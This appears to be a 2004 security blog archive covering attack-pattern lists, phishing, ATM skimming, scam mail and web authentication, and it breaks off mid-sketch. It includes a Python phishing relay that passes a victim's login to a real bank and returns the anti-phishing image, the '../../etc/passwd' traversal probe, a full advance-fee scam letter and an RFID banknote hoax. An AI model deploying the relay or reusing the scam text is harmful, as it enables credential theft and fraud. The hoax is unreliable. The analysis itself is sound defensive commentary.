    14. Relative Path Traversal
    15. Client-Controlled Environment Variables
    16. User-Supplied Global Variables (DEBUG=1, PHP Globals, and So Forth)
    17. Session ID, Resource ID, and Blind Trust
    18. Analog In-Band Switching Signals (aka "Blue Boxing")
    19. Attack Pattern Fragment: Manipulating Terminal Devices
    20. Simple Script Injection
    21. Embedding Script in Nonscript Elements
    22. XSS in HTTP Headers
    23. HTTP Query Strings
    24. User-Controlled Filename
    25. Passing Local Filenames to Functions That Expect a URL
    26. Meta-characters in E-mail Header
    27. File System Function Injection, Content Based
    28. Client-side Injection, Buffer Overflow
    29. Cause Web Server Misclassification
    30. Alternate Encoding the Leading Ghost Characters
    31. Using Slashes in Alternate Encoding
    32. Using Escaped Slashes in Alternate Encoding
    33. Unicode Encoding
    34. UTF-8 Encoding
    35. URL Encoding
    36. Alternative IP Addresses
    37. Slashes and URL Encoding Combined
    38. Web Logs
    39. Overflow Binary Resource File
    40. Overflow Variables and Tags
    41. Overflow Symbolic Links
    42. MIME Conversion
    43. HTTP Cookies
    44. Filter Failure through Buffer Overflow
    45. Buffer Overflow with Environment Variables
    46. Buffer Overflow in an API Call
    47. Buffer Overflow in Local Command-Line Utilities
    48. Parameter Expansion
    49. String Format Overflow in syslog()

    These attack patterns can be used to discover potential security defects.
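    Most of these patterns are mechanical enough to test for directly. Taking pattern 14 (relative path traversal) as an example, the probe is one line and the defence only a few more - a hedged sketch, with BASE as a placeholder directory:

        # Pattern 14, relative path traversal: reject any user-supplied
        # filename that resolves outside the base directory.
        import os

        BASE = "/var/www/uploads"   # placeholder

        def safe_open(user_filename: str):
            # realpath() resolves ".." components and symlinks before
            # the prefix check, closing the obvious bypasses.
            path = os.path.realpath(os.path.join(BASE, user_filename))
            if not path.startswith(BASE + os.sep):
                raise ValueError("path traversal attempt: %r" % user_filename)
            return open(path, "rb")

        # The attacker's probe, per pattern 14:
        #   safe_open("../../etc/passwd")   -> ValueError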

    References

    [Saltzer] Saltzer, Jerry, and Mike Schroeder, "The Protection of Information in Computer Systems", Proceedings of the IEEE. Vol. 63, No. 9 (September 1975), pp. 1278-1308. Available on-line at http://cap-lore.com/CapTheory/ProtInf/.
    [Neumann] Neumann, Peter, Principled Assuredly Trustworthy Composable Architectures: (Emerging Draft of the) Final Report, December 2003.
    [Viega] Viega, John, and Gary McGraw. Building Secure Software: How to Avoid Security Problems the Right Way, Reading, MA: Addison Wesley, 2001.
    [Howard 2002] Howard, Michael, and David C. LeBlanc. Writing Secure Code, 2nd edition, Microsoft Press, 2002
    [Schneier] Schneier, Bruce. Secrets and Lies: Digital Security in a Networked World, John Wiley & Sons (2000)
    [Leveson] Leveson, Nancy G. Safeware: System Safety and Computers, Addison-Wesley, 1995.
    [Moore 1999] Moore, Geoffrey A., Inside the Tornado : Marketing Strategies from Silicon Valley's Cutting Edge. HarperBusiness; Reprint edition July 1, 1999.
    [Moore 2002] Moore, Geoffrey A. Crossing the Chasm. Harper Business, 2002.
    [Hoglund] Hoglund, Greg, and Gary McGraw. Exploiting Software: How to Break Code, Addison-Wesley, 2004.

    Posted by iang at 07:54 AM | Comments (0) | TrackBack
    March 30, 2004

    Spammer's Porsche up for grabs

    Story on how the "free email leads to spam" equation is being changed with massive private litigation:

    Internet giant AOL has ratcheted up the war against unsolicited e-mail with a publicity-grabbing coup - an online raffle of a spammer's seized Porsche.

    AOL won the car - a $47,000 Boxster S - as part of a court settlement against an unnamed e-mailer last year.

    "We'll take cars, houses, boats - whatever we can find and get a hold of," said AOL's Randall Boe.

    According to Mr Boe, the Porsche's previous owner made more than $1m by sending junk e-mail.

    Hitting them where it hurts

    AOL is one of the noisiest opponents of the evasive spam trade, and this month joined forces with Microsoft, Yahoo and Earthlink to sue hundreds of spammers.

    Seizure of property is becoming a major tactic in these lawsuits, since guilty spammers often protest their inability to pay large fines.


    The Porsche-owning spammer, whose identity remains confidential, was one of a group sued last year for having sent 1 billion junk messages to AOL members, pitching pornography, college degrees, cable TV descramblers and other products.

    Mr Boe said the Porsche was seized mainly for its symbolic value, as the obvious fruit of an illegal trade.

    The Porsche sweepstake lasts until 8 April, and will be open only to those who were AOL members when it was first announced.

    Story from BBC NEWS:
    http://news.bbc.co.uk/go/pr/fr/-/2/hi/business/3581435.stm

    Published: 2004/03/30 07:20:09 GMT

    © BBC MMIV

    Posted by iang at 04:50 PM | Comments (0) | TrackBack

    March 18, 2004

    Terror network was tracked by cellphone chips

    A good article on the tracking of terror cells, drawing from some weaknesses in cell commsec. The article appears, and purports, to be complete only because the methods described have already been rendered useless: a new weapon, a new defence. Anti-terror battles are like that; this shows how much more effective police-style investigation is against terrorism than a military posture.

    http://www.iht.com/articles/508783.html

    Terror network was tracked by cellphone chips

    Don Van Natta Jr. and Desmond Butler/NYT
    Thursday, March 4, 2004

    How cellphones helped track global terror web

    LONDON - The terrorism investigation code-named Mont Blanc began almost by accident in April 2002, when authorities intercepted a cellphone call that lasted less than a minute and involved not a single word of conversation.

    Investigators, suspicious that the call was a signal between terrorists, followed the trail first to one terror suspect, then to others, and eventually to terror cells on three continents.

    What tied them together was a computer chip smaller than a fingernail. But before the investigation wound down in recent weeks, its global net caught dozens of suspected Qaeda members and disrupted at least three planned attacks in Saudi Arabia and Indonesia, according to counterterrorism and intelligence officials in Europe and the United States.

    The investigation helped narrow the search for one of the most wanted men in the world, Khalid Shaikh Mohammed, who is accused of being the mastermind of the Sept. 11 attacks, according to three intelligence officials based in Europe. The U.S. authorities arrested Mohammed in Pakistan last March.

    For two years, investigators now say, they were able to track the conversations and movements of several Qaeda leaders and dozens of operatives after determining that the suspects favored a particular brand of cellphone chip. The chips carry prepaid minutes and allow phone use around the world.

    Investigators said they believed that the chips, made by Swisscom of Switzerland, were popular with terrorists because they could buy the chips without giving their names.

    "They thought these phones protected their anonymity, but they didn't," said a senior intelligence official based in Europe. Even without personal information, the authorities were able to conduct routine monitoring of phone conversations.

    A half-dozen senior officials in the United States and Europe agreed to talk in detail about the previously undisclosed investigation because, they said, it was completed. They also said they had strong indications that terror suspects, alert to the phones' vulnerability, had largely abandoned them for important communications and instead were using e-mail, Internet phone calls and hand-delivered messages.

    "This was one of the most effective tools we had to locate Al Qaeda," said a senior counterterrorism official in Europe.

    The officials called the operation one of the most successful investigations since Sept. 11, 2001, and an example of unusual cooperation between agencies in different countries. Led by the Swiss, the investigation involved agents from more than a dozen countries, including the United States, Pakistan, Saudi Arabia, Germany, Britain and Italy.

    In 2002, the German authorities broke up a cell after monitoring calls by Abu Musab al-Zarqawi, who has been linked by some top U.S. officials to Al Qaeda, in which he could be heard ordering attacks on Jewish targets in Germany. Since then, investigators say, Zarqawi has been more cautious.

    "If you beat terrorists over the head enough, they learn," said Colonel Nick Pratt, a counterterrorism expert and professor at the George C. Marshall European Center for Security Studies in Garmisch-Partenkirchen, Germany. "They are smart."

    Officials say that on the rare occasions when operatives still use mobile phones, they keep the calls brief and use code words.

    "They know we are on to them and they keep evolving and using new methods, and we keep finding ways to make life miserable for them," said a senior Saudi official. "In many ways, it's like a cat-and-mouse game."

    Some Qaeda lieutenants used cellphones only to arrange a conversation on a more secure telephone. It was one such brief cellphone call that set off the Mont Blanc investigation.

    The call was placed on April 11, 2002, by Christian Ganczarski, a 36-year-old Polish-born German Muslim who the German authorities suspected was a member of Al Qaeda. From Germany, Ganczarski called Khalid Shaikh Mohammed, said to be Al Qaeda's military commander, who was running operations at the time from a safe house in Karachi, Pakistan, according to two officials involved in the investigation.

    The two men did not speak during the call, counterterrorism officials said. Instead, the call was intended to alert Mohammed of a Qaeda suicide bombing mission at a synagogue in Tunisia, which took place that day, according to two senior officials. The attack killed 21 people, mostly German tourists.

    Through electronic surveillance, the German authorities traced the call to Mohammed's Swisscom cellphone, but at first they did not know it belonged to him. Two weeks after the Tunisian bombing, the German police searched Ganczarski's house and found a log of his many numbers, including one in Pakistan that was eventually traced to Mohammed. The German police had been monitoring Ganczarski because he had been seen in the company of militants at a mosque in Duisburg, and last June the French police arrested him in Paris.

    Mohammed's cellphone number, and many others, were given to the Swiss authorities for further investigation. By checking Swisscom's records, Swiss officials discovered that many other Qaeda suspects used the Swisscom chips, known as Subscriber Identity Module, or SIM cards, which allow phones to connect to cellular networks.

    For months the Swiss, working closely with counterparts in the United States and Pakistan, used this information in an effort to track Mohammed's movements inside Pakistan. By monitoring the cellphone traffic, they were able to get a fix on Mohammed, but the investigators did not know his specific location, officials said.

    Once Swiss agents had established that Mohammed was in Karachi, the U.S. and Pakistani security services took over the hunt with the aid of technology at the U.S. National Security Agency, said two senior European intelligence officials. But it took months for them to actually find Mohammed "because he wasn't always using that phone," an official said. "He had many, many other phones."

    Mohammed was a victim of his own sloppiness, said a senior European intelligence official. He was meticulous about changing cellphones, but apparently he kept using the same SIM card.

    In the end, the authorities were led directly to Mohammed by a CIA spy, the director of central intelligence, George Tenet, said in a speech last month. A senior U.S. intelligence official said this week that the capture of Mohammed "was entirely the result of excellent human operations."

    When Swiss and other European officials heard that U.S. agents had captured Mohammed last March, "we opened a big bottle of Champagne," a senior intelligence official said.

    Among Mohammed's belongings, the authorities seized computers, cellphones and a personal phone book that contained hundreds of numbers. Tracing those numbers led investigators to as many as 6,000 phone numbers, which amounted to a virtual road map of Al Qaeda's operations, officials said.

    The authorities noticed that many of Mohammed's communications were with operatives in Indonesia and Saudi Arabia. Last April, using the phone numbers, officials in Jakarta broke up a terror cell connected to Mohammed, officials said.

    After the suicide bombings of three housing compounds in Riyadh, Saudi Arabia, on May 12, the Saudi authorities used the phone numbers to track down two "live sleeper cells." Some members were killed in shootouts with the authorities; others were arrested.

    Meanwhile, the Swiss had used Mohammed's phone list to begin monitoring the communications and activities of nearly two dozen of his associates. "Huge resources were devoted to this," a senior official said. "Many countries were constantly doing surveillance, monitoring the chatter."

    Investigators were particularly alarmed by one call they overheard last June. The message: "The big guy is coming. He will be here soon."

    An official familiar with the calls said, "We did not know who he was, but there was a lot of chatter." Whoever "the big guy" was, the authorities had his number. A Swisscom chip was in the phone.

    "Then we waited and waited, and we were increasingly anxious and worried because we didn't know who it was or what he had intended to do," an official said.

    But in July, the man believed to be "the big guy," Abdullah Oweis, who was born in Saudi Arabia, was arrested in Qatar. "He is one of those people able to move within Western societies and to help the mujahedeen, who have lesser experience," an official said. "He was at the very center of the Al Qaeda hierarchy. He was a major facilitator."

    In January, the operation led to the arrests of eight people accused of being members of a Qaeda logistical cell in Switzerland.

    Some are suspected of helping with the suicide bombings of the housing compounds in Riyadh, which killed 35 people, including eight Americans.

    Later, the European authorities discovered that Mohammed had contacted a company in Geneva that sells Swisscom phone cards. Investigators said he ordered the cards in bulk.

    The New York Times

    Copyright © 2003 The International Herald Tribune

    Posted by iang at 06:33 PM | Comments (0) | TrackBack

    March 17, 2004

    Centralised Insecurity

    What surprises me is that no-one is asking why we think the government can do a better job with centralised security than the rest of us can do by ourselves. Whoops! Spoke too soon - Bruce Schneier writes about exactly that in Security Risks of Centralization.


    Security Risks of Centralization

    In discussions with Brill, he regularly said things like: "It's obviously better to do something than nothing." Actually, it's not obvious. Replacing several decentralized security systems with a single centralized security system can actually reduce the overall security, even though the new system is more secure than the systems being replaced.

    An example will make this clear. I'll postulate piles of money secured by individual systems. The systems are characterized by the cost to break them. A $100 pile of money secured by a $200 system is secure, since it's not worth the cost to break. A $100 pile of money secured by a $50 system is insecure, since an attacker can make $50 profit by breaking the security and stealing the money.

    Here's my example. There are 10 $100 piles, each secured by individual $200 security systems. They're all secure. There are another 10 $100 piles, each secured by individual $50 systems. They're all insecure.

    Clearly something must be done.

    One suggestion is to replace all the individual security systems by a single centralized system. The new system is much better than the ones being replaced; it's a $500 system.

    Unfortunately, the new system won't provide more security. Under the old systems, 10 piles of money could be stolen at a cost of $50 per pile; an attacker would realize a total profit of $500. Under the new system, we have 20 $100 piles all secured by a single $500 system. An attacker now has an incentive to break that more-secure system, since he can steal $2000 by spending $500 -- a profit of $1500.

    The problem is centralization. When individual security systems are combined in one centralized system, the incentive to break that new system is generally higher. Even though the centralized system may be harder to break than any of the individual systems, if it is easier to break than ALL of the individual systems, it may result in less security overall.

    There is a security benefit to decentralized security.
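    Schneier's arithmetic generalises in an obvious way: a rational attacker hits every target whose loot exceeds its breaking cost, so the defenders' expected loss is the sum over profitable targets. A few lines make the trade-off explicit (the figures are his):

        # Schneier's example: an attacker hits any target whose loot
        # exceeds the cost of breaking its security system.
        def expected_loss(targets):
            return sum(loot for loot, cost in targets if loot > cost)

        decentralised = [(100, 200)] * 10 + [(100, 50)] * 10
        centralised = [(2000, 500)]   # all twenty piles, one $500 system

        print(expected_loss(decentralised))   # 1000: only the weak piles fall
        print(expected_loss(centralised))     # 2000: everything falls at once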

    Posted by iang at 12:08 PM | Comments (0) | TrackBack

    U.S. info-sharing program draws fire

    Bruce Schneier's Crypto-Gram pointed at the controversial new program that encourages US companies to share their vulnerability information with the Department of Homeland Security.

    It's a bit long to post, but it's well worth reading if one is interested in public & critical infrastructure protection. The bottom line: the new legal protection will probably cause more trouble than it's worth, and may make things more insecure:

    U.S. info-sharing program draws fire

    By Kevin Poulsen, SecurityFocus Feb 20 2004 6:08PM

    A long-anticipated program meant to encourage companies to provide the federal government with confidential information about vulnerabilities in critical systems took effect Friday, but critics worry that it may do more harm than good.

    The so-called Protected Critical Infrastructure Information (PCII) program allows corporations who run key elements of U.S. infrastructure -- energy firms, telecommunications carriers, financial institutions, etc. -- to submit details about their physical and cyber vulnerabilities to a newly-formed office within the Department of Homeland Security, with legally-binding assurances that the information will not be used against them or released to the public.

    The program implements controversial legislation that bounced around Capitol Hill for years before Congress passed it in the wake of the September 11 attacks as part of the Homeland Security Act of 2002. Security agencies have long sought information about vulnerabilities and likely attack points in critical infrastructures, but have found the private sector reluctant to share, for fear that sensitive or embarrassing information would be released through the Freedom of Information Act (FOIA).

    As of Friday, federal law now protects that vulnerability information from disclosure through FOIA, and makes it illegal for government workers to leak it, provided companies follow certain procedures and submit the data to the new PCII office.
    ....

    Posted by iang at 11:43 AM | Comments (0) | TrackBack

    March 10, 2004

    Nigerian scammers now using the Queen's English

    I just received my first well-written, properly spelt Nigerian fraud letter - and they've moved to Britain! Of course, it is the same old same old concept. Text is below if you are even the slightest bit interested.

    My name is Becky J. Harding, I am a senior partner in the firm of Midland Consulting Limited: Private Investigators and Security Consultants. We are conducting a standard process investigation on behalf of HSBC, the International Banking Conglomerate.

    This investigation involves a client who shares the same surname with you and also the circumstances surrounding investments made by this client at HSBC Republic, the Private Banking arm of HSBC. The HSBC Private Banking client died intestate and nominated no successor in title over the investments made with the bank. The essence of this communication with you is to request you provide us information/comments on any or all of the four issues:

    1-Are you aware of any relative/relation who shares your same name whose last known contact address was Brussels Belgium?
    2-Are you aware of any investment of considerable value made by such a person at the Private Banking Division of HSBC Bank PLC?
    3-Born on the 1st of October 1941
    4-Can you establish beyond reasonable doubt your eligibility to assume status of successor in title to the deceased?

    It is pertinent that you inform us ASAP whether or not you are familiar with this personality that we may put an end to this communication with you and our inquiries surrounding this personality.

    You must appreciate that we are constrained from providing you with more detailed information at this point. Please respond to this mail as soon as possible to afford us the opportunity to close this investigation.

    Thank you for accommodating our enquiry.

    Becky J. Harding.
    For: Midland Consulting Limited.
    10/03/2004

    Posted by iang at 02:10 PM | Comments (0) | TrackBack

    March 08, 2004

    PayPal Probed for Anti-Fraud Efforts

    PayPal Probed for Anti-Fraud Efforts
    Monday March 8, 11:51 am ET

    WASHINGTON (Reuters) - Federal and state investigators are examining whether online payment service PayPal violated consumer-protection laws in its fight against online fraud, parent company eBay Inc. (NasdaqNM:EBAY - News) said on Monday.

    PayPal sometimes freezes customer accounts while it investigates suspicious transactions, a practice that has generated complaints to consumer-protection authorities, the online auctioneer said in its annual report.

    "As a result of customer complaints, PayPal has ... received inquiries regarding its restriction and disclosure practices from the Federal Trade Commission and the attorneys general of a number of states," the report said.

    "If PayPal's processes are found to violate federal or state law on consumer protection and unfair business practices, it could be subject to an enforcement action or fines."

    An FTC spokeswoman declined initial comment.

    PayPal handled more than $12.2 billion in transactions in 2003 and has 40 million customer accounts, according to the annual report.

    The rate of fraudulent PayPal transactions is less than one-half of one percent, eBay has said.

    An eBay spokesman was not immediately available for comment.

    © 2004 Reuters

    Posted by iang at 11:44 AM | Comments (0) | TrackBack

    March 05, 2004

    Anti-Phishing WG

    A working group on anti-phishing was formed late last year, and now publishes the first attempts (that I have seen) at hard statistics on the epidemic in their monthly Phishing Attack Trends Report.

    The report has one salient number: 176 unique phishing attacks in January, up from 116 the previous month. Another document listed on that site (FTC's National and State Trends in Fraud and Identity Theft) showed a figure of $200 million lost in Internet related fraud over the year 2003.

    Worth a read, if looking for hard info on phishing. As the WG has just been formed, and stats only go back a few months, it's too early to tell whether this is the collection ramping up, or we are in the middle of an explosion. The FTC's $200m doesn't drill down any further, so phishing will be some small percentage of that number.

    (I'm not sure why the WG publishes in PDF, instead of HTML. It seems that they are reaching to bureaucrats and marketeers rather than techies, which is a worrying sign.)

    Posted by iang at 12:28 PM | Comments (0) | TrackBack

    March 03, 2004

    Phishing - and now the "solutions providers"

    A "solution" to Phishing called PassMarks has been proposed.

    The idea is that the site presents an individualised image, the PassMark, for each account on login. Unfortunately, this won't work.

    Phishing involves interposing the attacking site as a spoof between the client's browser and the target site. The spoofing site simply copies the registration details across to the main website, and waits for the PassMark image to come back. And then copies the image back to the user's browser.
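
    To make the mechanics concrete, here's a minimal sketch in Python of that relay. The endpoint names (bank.example, /login/step1, /passmark.png) are hypothetical stand-ins, not PassMark's actual protocol:

        import requests
        from http.server import BaseHTTPRequestHandler, HTTPServer
        from urllib.parse import parse_qs

        REAL_SITE = "https://bank.example"   # hypothetical target site

        class SpoofHandler(BaseHTTPRequestHandler):
            def do_POST(self):
                # the victim has just typed a username into our spoof page
                length = int(self.headers["Content-Length"])
                fields = parse_qs(self.rfile.read(length).decode())
                # 1. relay the username across to the real site
                session = requests.Session()
                session.post(REAL_SITE + "/login/step1",
                             data={"username": fields["username"][0]})
                # 2. wait for the PassMark image to come back
                image = session.get(REAL_SITE + "/passmark.png").content
                # 3. copy the image back to the victim, who now sees
                #    "their" image and confidently types the password in
                self.send_response(200)
                self.send_header("Content-Type", "image/png")
                self.end_headers()
                self.wfile.write(image)

        HTTPServer(("", 8080), SpoofHandler).serve_forever()

    Nothing binds the image to the channel it travels over, so the spoof is a pure pass-through.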

    The flaw in their analysis may have been that they didn't realise that almost all phishing totally bypasses SSL. Of course. Or, maybe they didn't realise that the attackers are intelligent, and modify their approach to cope with the system under attack. Easy mistake to make, one supposes.

    The analysis we've done still stands - what is needed to secure browsing against (current day, validated) threats like phishing is to modify the existing underutilised SSL infrastructure in some fairly minor ways.

    The analysis is long, complex and not written down in full. You can see something of the story on the SSL page.

    Further references: The anti-phishing WG's resources page has some potentially useful stuff. Simon's blog entry on PassMark put me on to this product, and also this fair overview by Scott Loftesness.

    Posted by iang at 01:20 PM | Comments (0) | TrackBack

    RFIDs in US notes?

    PrisonPlanet reports that RFIDs are being used in new US notes! Read on for surprising results.

    Is this a spoof or the birth of a new urban legend? If you have nothing better to do, read slashdot's opinion, which amongst much chit chat suggests that this is not RFIDs:

    RFID Tags in New US Notes Explode When You Try to Microwave Them

    Adapted from a letter sent to Henry Makow Ph.D.

    Want to share an event with you, that we experienced this evening.. Dave had over $1000 dollars in his back pocket (in his wallet). New twenties were the lion share of the bills in his wallet. We walked into a truck stop/travel plaza and they have those new electronic monitors that are supposed to say if you are stealing something. But through every monitor, Dave set it off. He did not have anything to purchase in his hands or pockets. After numerous times of setting off these monitors, a person approached Dave with a 'wand' to swipe why he was setting off the monitors.

    Believe it or not, it was his 'wallet'. That is according to the minimum wage employees working at the truck stop! We then walked across the street to a store and purchased aluminum foil. We then wrapped our cash in foil and went thru the same monitors. No monitor went off.

    We could have left it at that, but we have also paid attention to the European Union and the 'rfid' tracking devices placed in their money, and the blatant bragging of Walmart and many corporations of using 'rfid' electronics on every marketable item by the year 2005.

    Dave and I have brainstormed the fact that most items can be 'microwaved' to fry the 'rfid' chip, thus elimination of tracking by our government.

    So we chose to 'microwave' our cash, over $1000 in twenties in a stack, not spread out on a carasoul. Do you know what exploded on American money?? The right eye of Andrew Jackson on the new twenty, every bill was uniform in it's burning... Isnt that interesting?

    Now we have to take all of our bills to the bank and have them replaced, cause they are now 'burnt'.

    We will now be wrapping all of our larger bills in foil on a regular basis.

    What we resent is the fact that the government or a corporation can track our 'cash'. Credit purchases and check purchases have been tracked for years, but cash was not traceble until now...

    Dave and Denise

    Posted by iang at 08:47 AM | Comments (0) | TrackBack

    February 26, 2004

    Browser Threat Model

    All security models call for a threat model; it is one of the key inputs or factors in the construction of the security model. Secure browsing - SSL / HTTPS - lacked this critical analysis, and recent work over on the Mozilla Browser Project is calling for the rectification of this. Here's my attempt at a threat model for secure browsing, in draft.

    Comments welcome. One thing - I've not found any doco on how a threat model is written out, so I'm in the dark a bit. But, ignorance is no excuse for not trying...

    Posted by iang at 09:23 PM | Comments (2) | TrackBack

    February 25, 2004

    BSD - the world's safest OS

    "London, UK - 19 February 2004, 17:30 GMT - A study by the mi2g Intelligence Unit reveals that the world's safest and most secure online server Operating System (OS) is proving to be the Open Source family of BSD (Berkley Software Distribution) and the Mac OS X based on Darwin. The study also reveals that Linux has become the most breached online server OS in the government and non-government spheres for the first time, while the number of successful hacker attacks against Microsoft Windows based servers have fallen consistently for the last ten months."

    To read the rest, you have to buy the report, but ...

    You can see more in the article below, from last year:

    Linux is favourite hacker target: Study

    By JACK KAPICA Globe and Mail Update
    Friday, Sep. 12, 2003

    Linux, not Microsoft Windows, remains the most-attacked operating system, a British security company reports.

    During August, 67 per cent of all successful and verifiable digital attacks against on-line servers targeted Linux, followed by Microsoft Windows at 23.2 per cent. A total of 12,892 Linux on-line servers running e-business and information sites were successfully breached in that month, followed by 4,626 Windows servers, according to the report.

    Just 360 - less than 2 per cent - of BSD Unix servers were successfully breached in August.

    The data comes from the London-based mi2g Intelligence Unit, which has been collecting data on overt digital attacks since 1995 and verifying them. Its database has tracked more than 280,000 overt digital attacks and 7,900 hacker groups.

    Linux remained the most attacked operating system on-line during the past year, with 51 per cent of all successful overt digital attacks.

    Microsoft Windows servers belonging to governments, however, were the most attacked (51.4 per cent) followed by Linux (14.3 per cent) in August.

    The economic damage from the attacks, in lost productivity and recovery costs, fell below average in August, to $707-million (U.S.).

    The overall economic damage in August from overt and covert attacks as well as viruses and worms stood at an all-time high of $28.2-billion.

    The Sobig and MSBlast malware that afflict Microsoft platforms contributed significantly to the record estimate.

    "The proliferation of Linux within the on-line server community coupled with inadequate knowledge of how to keep that environment secure when running vulnerable third-party applications is contributing to a consistently higher proportion of compromised Linux servers," mi29 chairman D.K. Matai said.

    "Microsoft deserves credit for having reduced the proportion of successful on-line hacker attacks perpetrated against Windows servers."



    Addendum 12 June 2004: This May PR from mi2g gives a bit of an update:

    "The May figures for manual and semi-automated hacking attacks - 18,847 - against online servers worldwide show signs of stabilisation in comparison to each of the three previous months. At present rates, the projected number of overt digital attacks carried out by hackers against online servers in 2004 will be only 2% up on the previous year and would stand at around 220,000. If this trend continues, it will mark the slowest growth rate for manual and semi-automated hacking attacks against online servers according to records that date back to 1995. This confirms that the dominant threat to the global digital eco-system is coming from malware as opposed to direct hacking attacks."

    Posted by iang at 11:18 AM | Comments (0) | TrackBack

    February 24, 2004

    Candid ATM Camera

    Again from Simon Lelieveldt's blog, we see some photos and explanation of a Candid ATM Camera and a duplicate card reader inserted on an ATM Housing, for snooping numbers.

    Just to get a feel for this, it is worth clicking and waiting for the photos to download! Check the quality of the workmanship on the hidden camera.

    Posted by iang at 06:43 PM | Comments (0) | TrackBack

    February 23, 2004

    Are debit cards safe?

    Simon L mentions this article on debit card fraud. Curiously, no mention of Internet-related frauds, but a nice overview of the ways that ATMs get physically attacked.

    Posted by iang at 04:18 PM | Comments (0) | TrackBack

    February 09, 2004

    e-gold targeted by worm

    News reports from a couple of weeks back indicate that a worm called Dumaru-Y installs a keylogger that listens for e-gold passwords and account numbers.

    ZDNet .. VNUNet .. TechTarget

    This is significant in that this might be the first time that viruses are specifically targeting the DGCs with an attack on the user's dynamic activity. (MiMail just recently targeted both e-gold and PayPal users with more conventional spoofs.)

    e-gold is a special favourite with scammers and thieves for three reasons: its payments are RTGS, there is a deep market in independent exchange, and e-gold won't provide much help without a court order. Also, by volume of transactions it is by far the largest, which provides cover for theft.

    This has been thought about for a long time. In fact, one issuer of gold, eBullion, has had a hardware password token in place for a long time. Others like Pecunix have tried to set up a subsetting password approach, where only a portion of the password is revealed every time.
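
    A minimal sketch of the subsetting idea (the general technique, not Pecunix's actual implementation): the server asks for a few randomly chosen character positions, so a keylogger that captures one login learns only a fragment of the secret.

        import hmac
        import secrets

        def challenge(pw_len, k=3):
            # pick k distinct character positions, 1-based
            positions = set()
            while len(positions) < k:
                positions.add(secrets.randbelow(pw_len) + 1)
            return sorted(positions)

        def verify(stored_pw, positions, answers):
            expected = "".join(stored_pw[i - 1] for i in positions)
            return hmac.compare_digest(expected, "".join(answers))

        pw = "correct-horse-battery"                    # toy secret
        pos = challenge(len(pw))                        # e.g. [2, 9, 17]
        ok = verify(pw, pos, [pw[i - 1] for i in pos])  # True

    The catch is that the server must keep the password in recoverable form rather than as a plain hash, which is one reason the approach never displaced hardware tokens.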

    European banks delivered hardware tokens routinely to thwart such threats. This may have been prudent, but it also saddled these systems with excessive costs; the price of the eBullion crypto token was thought to be too high for most users.

    Using viruses is a new tactic, but not an unexpected one. As with all wars, look for an escalation of tactics, and commensurate improvements in security.

    Posted by iang at 08:57 PM | Comments (1) | TrackBack

    December 06, 2003

    Fighting the worms of mass destruction

    In a rare burst of journalistic research, the Economist has a good article on the state of viruses and similar security threats.

    It downplays terrorism, up-plays phishing, and agrees that Microsoft is a monoculture, but disagrees with the conclusions usually promoted from that.

    Even better, the Economist goes on to be quite perceptive about the future of anonymity, pseudonymity, and how to protect privacy. It's almost as if they did their homework! Well done, and definitely worth reading.

    Posted by iang at 09:45 PM | Comments (0) | TrackBack

    November 09, 2003

    The Good, The Bad, and the Ugly

    Microsoft's new bounty program has all the elements of a classic movie script [1]. In Sergio Leone's 3rd spaghetti western, The Man with No Name makes good money as a bounty hunter [2]. Is this another chance for him?

    Microsoft's theory is that they can stick up a few wanted posters, and thus rid the world of these Ugly virus writers. Law Enforcement Officers with angel eyes will see this as a great opportunity. Microsoft has all this cash, and the LEOs need a helping hand. Surely with the right incentives, they can file the report to the CyberSecurity Czar in Washington that the tips are flooding in?

    Wait for the tips, and go catch the Uglies. (And pay out the bounty.) Nothing could be simpler than that. Wait for more tips, and go catch more Uglies. And...

    Wait a minute! In the film, Tuco (the Ugly) and The Man with No Name (the Good) are in cahoots! Somehow, Tuco always gets away, and the two of them split the bounty. Again and again... It's a great game.

    Make no mistake, $250,000 in Confederate Gold just changed the incentive structure for your average virus writer. Up until now, writing viruses was just for fun. A challenge. Or a way to take down your hated anti-spam site. Some way for the frustrated ex-soviet nuclear scientist to stretch his talents. Or a way to poke a little fun at Microsoft.

    Now, there is financial incentive. With one wanted poster, Microsoft has turned virus writing into a profitable business. All Blondie has to do is write a virus, blow away a few million user installations, and then convince Tuco to sit still for a while in a Yankee jail.

    The Man with No Name may just ride again!

    [1] http://news.com.com/2100-1083-5103923.html
    [2] http://www.amazon.com/exec/obidos/ASIN/6304698798/

    Posted by iang at 01:41 AM | Comments (0) | TrackBack

    October 03, 2003

    Using SMS Challenge/Response to Secure Web Sites

    Merchants who *really* rely on their web sites being secure are those that take instructions for the delivery of value over them. It's a given that they have to work very hard to secure their websites, and it is instructive to watch their efforts.

    The cutting edge in making web sites secure is occurring in the gold community and presumably the PayPal community (I don't really follow the latter). AFAIK, this has been the case since the late 90's; before that, some of the European banks were doing heavy-duty stuff with expensive tokens.

    e-gold have a sort of graphical number that displays and has to be entered in by hand [1]. This works against bots, but the bot writers have, of course, conquered it somehow. e-gold are the recurrent victim of the spoofers, and it is not clear why they have not taken more serious steps to protect themselves against attacks on their system.
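
    For flavour, here is a rough sketch of how such a graphical number might be rendered - using Pillow, with jitter and noise lines to bother naive OCR; e-gold's actual generator is of course not public:

        import random
        from PIL import Image, ImageDraw

        def turing_image(digits):
            # draw each digit with positional jitter, then scribble
            # noise lines over the top
            img = Image.new("RGB", (26 * len(digits) + 20, 56), "white")
            draw = ImageDraw.Draw(img)
            for i, ch in enumerate(digits):
                draw.text((12 + 26 * i + random.randint(-4, 4),
                           18 + random.randint(-9, 9)), ch, fill="black")
            for _ in range(8):
                draw.line([(random.randint(0, img.width), random.randint(0, img.height)),
                           (random.randint(0, img.width), random.randint(0, img.height))],
                          fill="grey")
            return img

        turing_image("482913").save("challenge.png")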

    eBullion sell an expensive hardware token that I have heard stops attacks cold, but suffers from poor take-up because of its cost [2].

    Goldmoney relies on client certs, which also seem to suffer poor take-up - probably due to their clumsiness, a legacy of early, uncertain support in the browser and in the protocol. Also, Goldmoney has structured itself to be an unattractive target for attackers, using governance and marketing techniques, so I expect them to be the last to experience real tests of their security.

    Another small player called Pecunix allows you to integrate your PGP key into your account, and confirm your nymity using PGP signatures. At least one other player had decided to try smart cards.

    Now a company called NetPay.TV - I have no idea about them, really - have started a service that sends out a 6-digit PIN over the SMS messaging features of the GSM network for the user to type into the website [4].

    It's highly innovative and great security to use a completely different network to communicate with the user and confirm their nymity. On the face of it, it would seem to pretty much knock a hole into the incessant, boring and mind-bogglingly simple attacks against the recommended SSL web site approach.
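
    Presumably the flow is something like this minimal sketch; send_sms, the two-minute expiry and the rest are my assumptions, not NetPay.TV's published design:

        import secrets
        import time

        PIN_TTL = 120    # seconds before a PIN goes stale (an assumption)
        pending = {}     # user -> (pin, time issued)

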